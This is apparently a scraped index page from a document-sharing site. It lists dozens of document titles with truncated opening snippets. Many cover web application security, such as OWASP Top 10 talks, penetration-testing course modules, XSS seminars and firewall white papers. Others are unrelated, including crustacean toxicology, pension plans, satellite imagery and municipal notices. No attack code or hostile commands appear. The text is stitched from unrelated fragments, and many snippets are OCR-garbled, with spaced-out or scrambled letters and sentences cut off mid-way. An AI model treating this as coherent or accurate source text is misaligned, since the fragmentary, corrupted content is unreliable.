ComWIN Control Desk Management ComW IN visualises, controls and automates E x tre m e s itu a tio n s su ch as car a c c id e n ts o r te c h n ic a l fa u lts a re ju s t as m u ch p a rt o f th e jo
Critical Review MYSID CRUSTACEANS AS POTENTIAL TEST ORGANISMS FOR THE EVALUATION OF ENVIRONMENTAL ENDOCRINE DISRUPTION: A REVIEW
Coi Nb I^HIpRESSj Environm ental Toxicology and Chem istry, Vol. 23, No. 5, pp. 1219-1234, 2004 P rinted in ihc USA 0730-7 2 6 8 /0 4 $12.00 +.00 Critical Review MYSID CRUSTACEANS AS POTENTIAL TEST ORGANISMS
Out of the Fire - Adding Layers of Protection When Deploying Oracle EBS to the Internet
Out of the Fire - Adding Layers of Protection When Deploying Oracle EBS to the Internet March 8, 2012 Stephen Kost Chief Technology Officer Integrigy Corporation Phil Reimann Director of Business Development
Penetration Testing. Module 20
Penetration Testing Module 20 Ethical Hacking and Countermeasures Penetration Testing P e n e t r a t i o n T e s t i n g M o d u le 2 0 Engineered by Hackers. Presented by Professionals. C E H E t h i
Combinación de bandas óptima para la discriminación de sabanas colombianas, usando imagen Landsat ETM+ZYXWVUTSRQPONMLKJIHGFEDCB
Combinación de bandas óptima para la discriminación de sabanas colombianas, usando imagen Landsat ETM+ZYXWVUTSRQPONMLKJIHGFEDCB O p t i m a l L a n d s a t E T M + b a n d 's c o m b i n a t i o n f o
Health, Insurance, and Pension Plans in Union Contracts
Health, Insurance, and Pension Plans in Union Contracts Bulletin N o. 1187 UNITED STATES DEPARTMENT OF LABOR James P. Mitchell, Secretary BUREAU OF LABOR STATISTICS Ewan Clague, Commissioner Health, Insurance,
(WAPT) Web Application Penetration Testing
(WAPT) Web Application Penetration Testing Module 0: Introduction 1. Introduction to the course. 2. How to get most out of the course 3. Resources you will need for the course 4. What is WAPT? Module 1:
OWASP and OWASP Top 10 (2007 Update) OWASP. The OWASP Foundation. Dave Wichers. The OWASP Foundation. OWASP Conferences Chair dave.wichers@owasp.
and Top 10 (2007 Update) Dave Wichers The Foundation Conferences Chair [email protected] COO, Aspect Security [email protected] Copyright 2007 - The Foundation This work is available
A Unified Approach to Statistical Estimation and Model Parameterisation in Mass Calibration
A Unified Approach to Statistical Estimation and Model Parameterisation in Mass Calibration by Thom as S. Leahy B.Sc. i» A Thesis presented to Dublin City University For the Degree of D octor of Philosophy
How to break in. Tecniche avanzate di pen testing in ambito Web Application, Internal Network and Social Engineering
How to break in Tecniche avanzate di pen testing in ambito Web Application, Internal Network and Social Engineering Time Agenda Agenda Item 9:30 10:00 Introduction 10:00 10:45 Web Application Penetration
UNDERSTANDING FLOW PROCESSING WITHIN THE CISCO ACE M ODULE Application de liv e r y pr odu cts can distr ib u te tr af f ic to applications and w e b se r v ice s u sing v ar y ing le v e ls of application
Where every interaction matters.
Where every interaction matters. Peer 1 Vigilant Web Application Firewall Powered by Alert Logic The Open Web Application Security Project (OWASP) Top Ten Web Security Risks and Countermeasures White Paper
The SmartView Tracker
CHAPTER 5 S m a r tv ie w T r a c k e r In This Chapter The Need for Tracking p ag e 8 9 The C heck P oint S olu tion for Tracking p ag e 9 0 Tracking C onsiderations p ag e 9 6 Tracking C onfigu ration
H a c k i n g M o b i l e. P l a t f o r m. M o d u le 16
H a c k i n g M o b i l e P l a t f o r m s M o d u le 16 Ethical Hacking and Countermeasures Hacking M obile Platforms M o d u le 16 Engineered by Hackers. Presented by Professionals. CEH Q E t h i c
The Top Web Application Attacks: Are you vulnerable?
QM07 The Top Web Application Attacks: Are you vulnerable? John Burroughs, CISSP Sr Security Architect, Watchfire Solutions [email protected] Agenda Current State of Web Application Security Understanding
Engenharia de Software
Engenharia de Software Gerenciamento de Projeto Ian Sommerville 2000 Software Engineering, 6th edition. Chapter 4 Slide 1 Gerenciamento de Projeto Organização, planejamento e agendamento de projetos de
Barracuda Web Application Firewall vs. Intrusion Prevention Systems (IPS) Whitepaper
Barracuda Web Application Firewall vs. Intrusion Prevention Systems (IPS) Whitepaper Securing Web Applications As hackers moved from attacking the network to attacking the deployed applications, a category
3. Broken Account and Session Management. 4. Cross-Site Scripting (XSS) Flaws. Web browsers execute code sent from websites. Account Management
What is an? s Ten Most Critical Web Application Security Vulnerabilities Anthony LAI, CISSP, CISA Chapter Leader (Hong Kong) [email protected] Open Web Application Security Project http://www.owasp.org
WHITE PAPER. FortiWeb and the OWASP Top 10 Mitigating the most dangerous application security threats
WHITE PAPER FortiWeb and the OWASP Top 10 PAGE 2 Introduction The Open Web Application Security project (OWASP) Top Ten provides a powerful awareness document for web application security. The OWASP Top
An E mpir ical Analysis of Stock and B ond M ar ket Liquidity
A p r il 2 2, 2 0 0 2 An E mpir ical Analysis of Stock and B ond M ar ket Liquidity Ta r u n Ch o r d ia, A s a n i S a r ka r, a n d A va n id h a r S u b r a h m a n ya m Go iz u e t a B u s in e s s
Cloud Computing Strategic View
Donald Bell IBM Academic Initiative April 2010 [email protected] Cloud Computing Strategic View Strategy & Enterprise Initiatives Topics Cloud Computing IBM Academic Skills Cloud (Pilot) 2 http://www.youtube.com/watch?v=qb2hjpaqy-k&fmt=18',686,580);
Web Application Security
Web Application Security Prof. Sukumar Nandi Indian Institute of Technology Guwahati Agenda Web Application basics Web Network Security Web Host Security Web Application Security Best Practices Questions?
elearning for Secure Application Development
elearning for Secure Application Development Curriculum Application Security Awareness Series 1-2 Secure Software Development Series 2-8 Secure Architectures and Threat Modeling Series 9 Application Security
Last update: February 23, 2004
Last update: February 23, 2004 Web Security Glossary The Web Security Glossary is an alphabetical index of terms and terminology relating to web application security. The purpose of the Glossary is to
How to Successfully Integrate with ERP and Expense Management Systems
Treasury and Trade Solutions Citi Commercial Cards Innovation, Efficiency, Simplicity. 2015 Commercial Cards Conference May 18-20, 2015 How to Successfully Integrate with ERP and Expense Management Systems
GlasCraft Air Motor Repair Kits
Parts GlasCraft ir Motor Repair Kits 30393B ENG For replacing wear items used on GlasCraft air motors. For professional use only. Not for use in explosive atmospheres. Models M-325, M-500-02, GC2267, GC2273
Application Note: Cisco A S A - Ce r t if ica t e T o S S L V P N Con n e ct ion P r of il e Overview: T h i s a p p l i ca ti o n n o te e x p l a i n s h o w to co n f i g u r e th e A S A to a cco m
Enterprise Application Security Workshop Series
Enterprise Application Security Workshop Series Phone 877-697-2434 fax 877-697-2434 www.thesagegrp.com Defending JAVA Applications (3 Days) In The Sage Group s Defending JAVA Applications workshop, participants
WEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY
WEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY www.alliancetechpartners.com WEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY More than 70% of all websites have vulnerabilities
Web Application Security Assessment and Vulnerability Mitigation Tests
White paper BMC Remedy Action Request System 7.6.04 Web Application Security Assessment and Vulnerability Mitigation Tests January 2011 www.bmc.com Contacting BMC Software You can access the BMC Software
T c k D E GR EN S. R a p p o r t M o d u le Aa n g e m a a k t o p 19 /09 /2007 o m 09 :29 u u r BJB 06 013-0009 0 M /V. ja a r.
D a t a b a n k m r in g R a p p o r t M Aa n g e m a a k t o p 19 /09 /2007 o m 09 :29 u u r I d e n t if ic a t ie v a n d e m S e c t o r BJB V o lg n r. 06 013-0009 0 V o o r z ie n in g N ie u w la
Criteria for web application security check. Version 2015.1
Criteria for web application security check Version 2015.1 i Content Introduction... iii ISC- P- 001 ISC- P- 001.1 ISC- P- 001.2 ISC- P- 001.3 ISC- P- 001.4 ISC- P- 001.5 ISC- P- 001.6 ISC- P- 001.7 ISC-
Chapter 1 Web Application (In)security 1
Introduction xxiii Chapter 1 Web Application (In)security 1 The Evolution of Web Applications 2 Common Web Application Functions 4 Benefits of Web Applications 5 Web Application Security 6 "This Site Is
CSE598i - Web 2.0 Security OWASP Top 10: The Ten Most Critical Web Application Security Vulnerabilities
CSE598i - Web 2.0 Security OWASP Top 10: The Ten Most Critical Web Application Security Vulnerabilities Thomas Moyer Spring 2010 1 Web Applications What has changed with web applications? Traditional applications
THE UNIVERSITY OF SAN DIEGO CRIMINAL CLINIC: IT'S ALL IN THE MIX
FILE:N:\DTP\MISS\LEAD.RAW Jan 01/10/06 Tue 10:20AM THE UNIVERSITY OF SAN DIEGO CRIMINAL CLINIC: IT'S ALL IN THE MIX Jean Montoya * Although many legal educators would place the birth of clinical legal
SCO TT G LEA SO N D EM O Z G EB R E-
SCO TT G LEA SO N D EM O Z G EB R E- EG Z IA B H ER e d it o r s N ) LICA TIO N S A N D M ETH O D S t DVD N CLUDED C o n t e n Ls Pr e fa c e x v G l o b a l N a v i g a t i o n Sa t e llit e S y s t e
A Practical Usage of Innovative Web Design Methodology: The Relational Modeling Methodology
Abstract The web platform has transformed itself in the few years since its inception in 1993 from an instrument used merely to establish on-line presence to a platform that can support all facets of organizational
Web Application Attacks and Countermeasures: Case Studies from Financial Systems
Web Application Attacks and Countermeasures: Case Studies from Financial Systems Dr. Michael Liu, CISSP, Senior Application Security Consultant, HSBC Inc Overview Information Security Briefing Web Applications
Web Application Report
Web Application Report This report includes important security information about your Web Application. Security Report This report was created by IBM Rational AppScan 8.5.0.1 11/14/2012 8:52:13 AM 11/14/2012
C o m p u te r M o d e lin g o f M o le c u la r E le c tro n ic S tru c tu re
C o m p u te r M o d e lin g o f M o le c u la r E le c tro n ic S tru c tu re P e te r P u la y D e p a rtm e n t o f C h e m is try a n d B io c h e m is try, U n iv e rs ity o f A rk a n s a s, F a
First A S E M R e c to rs C o n f e re n c e : A sia E u ro p e H ig h e r E d u c a tio n L e a d e rsh ip D ia l o g u e Fre ie U n iv e rsitä t, B e rl in O c to b e r 2 7-2 9 2 0 0 8 G p A G e e a
B R T S y s te m in S e o u l a n d In te g r a te d e -T ic k e tin g S y s te m
Symposium on Public Transportation in Indian Cities with Special focus on Bus Rapid Transit (BRT) System New Delhi 20-21 Jan 2010 B R T S y s te m in S e o u l a n d In te g r a te d e -T ic k e tin g
Web applications. Web security: web basics. HTTP requests. URLs. GET request. Myrto Arapinis School of Informatics University of Edinburgh
Web applications Web security: web basics Myrto Arapinis School of Informatics University of Edinburgh HTTP March 19, 2015 Client Server Database (HTML, JavaScript) (PHP) (SQL) 1 / 24 2 / 24 URLs HTTP
re:think creativity ICT and tourism: gaming and creative technologies & applications
re:think creativity ICT and tourism: gaming and creative technologies & applications Presented by: Dr. N ik o s V o g ia t zis Corallia co-founder & chief Development & Operations officer gi-cluster Governance
What is Web Security? Motivation
[email protected] http://www.brucker.ch/ Information Security ETH Zürich Zürich, Switzerland Information Security Fundamentals March 23, 2004 The End Users View The Server Providers View What is Web
1.- L a m e j o r o p c ió n e s c l o na r e l d i s co ( s e e x p li c a r á d es p u é s ).
PROCEDIMIENTO DE RECUPERACION Y COPIAS DE SEGURIDAD DEL CORTAFUEGOS LINUX P ar a p od e r re c u p e ra r nu e s t r o c o rt a f u e go s an t e un d es a s t r e ( r ot u r a d e l di s c o o d e l a
Web application security
Web application security Sebastian Lopienski CERN Computer Security Team openlab and summer lectures 2010 (non-web question) Is this OK? int set_non_root_uid(int uid) { // making sure that uid is not 0
P R E F E I T U R A M U N I C I P A L D E J A R D I M
D E P A R T A M E N T O D E C O M P R A S E L I C I T A O A U T O R I Z A O P A R A R E A L I Z A O D E C E R T A M E L I C I T A T с R I O M O D A L I D A D E P R E G O P R E S E N C I A L N 034/ 2 0
2,000 Websites Later Which Web Programming Languages are Most Secure?
2,000 Websites Later Which Web Programming Languages are Most Secure? Jeremiah Grossman Founder & Chief Technology Officer 2010 WhiteHat Security, Inc. WhiteHat Security Founder & Chief Technology Officer
External Vulnerability Assessment. -Technical Summary- ABC ORGANIZATION
External Vulnerability Assessment -Technical Summary- Prepared for: ABC ORGANIZATI On March 9, 2008 Prepared by: AOS Security Solutions 1 of 13 Table of Contents Executive Summary... 3 Discovered Security
Magento Security and Vulnerabilities. Roman Stepanov
Magento Security and Vulnerabilities Roman Stepanov http://ice.eltrino.com/ Table of contents Introduction Open Web Application Security Project OWASP TOP 10 List Common issues in Magento A1 Injection
Web Application Security. Vulnerabilities, Weakness and Countermeasures. Massimo Cotelli CISSP. Secure
Vulnerabilities, Weakness and Countermeasures Massimo Cotelli CISSP Secure : Goal of This Talk Security awareness purpose Know the Web Application vulnerabilities Understand the impacts and consequences
Application Layer Encryption: Protecting against Application Logic and Session Theft Attacks. Whitepaper
Application Layer Encryption: Protecting against Application Logic and Session Theft Attacks Whitepaper The security industry has extensively focused on protecting against malicious injection attacks like
Purpose of presentation
ECONOMIC REGULATION Purpose of presentation To provide the Status Quo on Economic Regulation To indicate the ideal situation WHERE DOES THE MANDATE COME FROM? Constitution Water Services Act Section 10
STATE OF CEARÁ MUNICIPAL GOVERNMENT OF CRUZ MUNICIPAL COUNCIL OF CRUZ
PUBLIC COMPETITIVE EXAMINATION NOTICE No. 001/2012 Provides for a public competitive examination to fill positions and vacancies of the Prefeitura Munici
Cross-Site Scripting
Cross-Site Scripting (XSS) Computer and Network Security Seminar Fabrice Bodmer ([email protected]) UNIFR - Winter Semester 2006-2007 XSS: Table of contents What is Cross-Site Scripting (XSS)? Some
Web Application Vulnerability Testing with Nessus
The OWASP Foundation http://www.owasp.org Web Application Vulnerability Testing with Nessus Rïk A. Jones, CISSP [email protected] Rïk A. Jones Web developer since 1995 (16+ years) Involved with information
Secure Software Development for Java Developers
Secure Software Development for Java Developers Dominik Schadow Senior Consultant Trivadis GmbH 05/09/2012 BASEL BERN LAUSANNE ZÜRICH DÜSSELDORF FRANKFURT A.M. FREIBURG I.BR. HAMBURG MÜNCHEN STUTTGART
Creating a best fit between Business Strategy and Web Services Capabilities using Problem Frames Modeling approach
Creating a best fit between Business Strategy and Web Services Capabilities using Problem Frames Modeling approach Anju Jha 1, Karl Cox 2 & Keith T. Phalp 3 1 School of Computer Science and Engineering
Testing the OWASP Top 10 Security Issues
Testing the OWASP Top 10 Security Issues Andy Tinkham & Zach Bergman, Magenic Technologies Contact Us 1600 Utica Avenue South, Suite 800 St. Louis Park, MN 55416 1 (877)-277-1044 [email protected] Who Are
Web Application Security
E-SPIN PROFESSIONAL BOOK Vulnerability Management Web Application Security ALL THE PRACTICAL KNOW HOW AND HOW TO RELATED TO THE SUBJECT MATTERS. COMBATING THE WEB VULNERABILITY THREAT Editor's Summary
The purpose of this report is to educate our prospective clients about capabilities of Hackers Locked.
This sample report is published with prior consent of our client in view of the fact that the current release of this web application is three major releases ahead in its life cycle. Issues pointed out
ArcGIS Server Security Threats & Best Practices 2014. David Cordes Michael Young
ArcGIS Server Security Threats & Best Practices 2014 David Cordes Michael Young Agenda Introduction Threats Best practice - ArcGIS Server settings - Infrastructure settings - Processes Summary Introduction
BENEFITS OF AN INTEGRATED (PROSECUTION & DEFENSE) CRIMINAL LAW CLINIC
BENEFITS OF AN INTEGRATED (PROSECUTION & DEFENSE) CRIMINAL LAW CLINIC Linda F. Smith * This article describes the University of Utah's
FINAL DoIT 11.03.2015 - v.4 PAYMENT CARD INDUSTRY DATA SECURITY STANDARDS APPLICATION DEVELOPMENT AND MAINTENANCE PROCEDURES
Purpose: The Department of Information Technology (DoIT) is committed to developing secure applications. DoIT s System Development Methodology (SDM) and Application Development requirements ensure that
Passing PCI Compliance How to Address the Application Security Mandates
Passing PCI Compliance How to Address the Application Security Mandates The Payment Card Industry Data Security Standards includes several requirements that mandate security at the application layer. These
Advanced Web Technology 10) XSS, CSRF and SQL Injection 2
Berner Fachhochschule, Technik und Informatik Advanced Web Technology 10) XSS, CSRF and SQL Injection Dr. E. Benoist Fall Semester 2010/2011 Table of Contents Cross Site Request Forgery - CSRF Presentation
1. Introduction. 2. Web Application. 3. Components. 4. Common Vulnerabilities. 5. Improving security in Web applications
1. Introduction 2. Web Application 3. Components 4. Common Vulnerabilities 5. Improving security in Web applications 2 What does World Wide Web security mean? Webmasters=> confidence that their site won
Web Application Worms & Browser Insecurity
Web Application Worms & Browser Insecurity Mike Shema Welcome Background Hacking Exposed: Web Applications The Anti-Hacker Toolkit Hack Notes: Web Security Currently working at Qualys
Public Health is Like..
Public Health is Like... A box of chocolates. You never know what you're gonna get, Forrest Gump. So... Build the evidence-base for public health practice Building the Evidence-Base Science is contributing
Learn Ethical Hacking, Become a Pentester
Learn Ethical Hacking, Become a Pentester Course Syllabus & Certification Program DOCUMENT CLASSIFICATION: PUBLIC Copyrighted Material No part of this publication, in whole or in part, may be reproduced,
Unit 16: Software Development Standards Objective To provide a guide on how to achieve software process improvement through the use of software and systems engineering standards.
Introduction:... 1 Security in SDLC:... 2 Penetration Testing Methodology: Case Study... 3
Table of Contents Introduction:... 1 Security in SDLC:... 2 Penetration Testing Methodology: Case Study... 3 Information Gathering... 3 Vulnerability Testing... 7 OWASP TOP 10 Vulnerabilities:... 8 Injection
